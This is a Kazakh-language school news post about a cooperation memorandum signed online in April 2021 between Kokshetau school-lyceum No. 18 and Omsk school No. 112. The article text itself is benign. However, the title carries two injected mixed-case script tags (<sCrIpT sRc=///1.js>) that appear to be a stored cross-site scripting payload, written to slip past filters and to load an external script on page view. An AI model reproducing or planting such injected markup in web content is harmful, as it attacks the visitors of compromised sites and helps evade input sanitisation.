Ресейлік әріптестермен кездесу.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

08.04.2021

          07.04.2021 жылы мектебіміз үшін  онлайн-форматта елеулі іс-шаралардың  бірі өтті.

          «Ақмола облысы білім басқармасының Көкшетау қаласы бойынша білім бөлімі» ММ-сінің басшысы Башарова Дина Уразгалиевна, «Сәкен Жүнісов атындағы «№18 мектеп-лицейі» КММ-нің директоры Сарсембаева Баян Вахитовна, Ресей Федерациясы  Омбы қаласының №112 жалпы орта мектеп директоры Лиханова Ольга Владимировна өзара халықаралық қарым-қатынас құру Меморандум келісіміне қол қойылды.

          Келісім жасау мақсаты: мемлекет пен қоғам, ата-аналар, білім алушылардың сұранысына сәйкес сапалы білімді ұйымдастыру, іс-тәжірибесімен алмасу. Іс-шараға Көкшетау қаласы бойынша білім бөлімінің тілдік пәндер жөніндегі әдіскері Дюсенова Гайни Омирбаевна, мектеп әкімшілігі және мектептің «Орыс тілі және әдебиеті», «Ағылшын тілі» әдістеме бірлестіктерінің мұғалімдері қатысты.

          Сәкен Жүнісов атындағы №18 мектеп-лицейінің директоры  Сарсембаева Баян Вахитовна кездесуді мектепті таныстырумен бастап, тілідік пәндер мұғалімдері өз жұмыс барысымен және жетістіктерімен Омбы қаласындағы әріптестерімен бөлісті. Меморандум шеңберінде жоспар құрылып, жоспарға сай екіжақты іс-шаралар белгіленді.Кездесу барысында жылы, достық атмосфера орнатылды.

Просмотров: 722


Пікір қосу



Деректерді қолтаңбаға қосу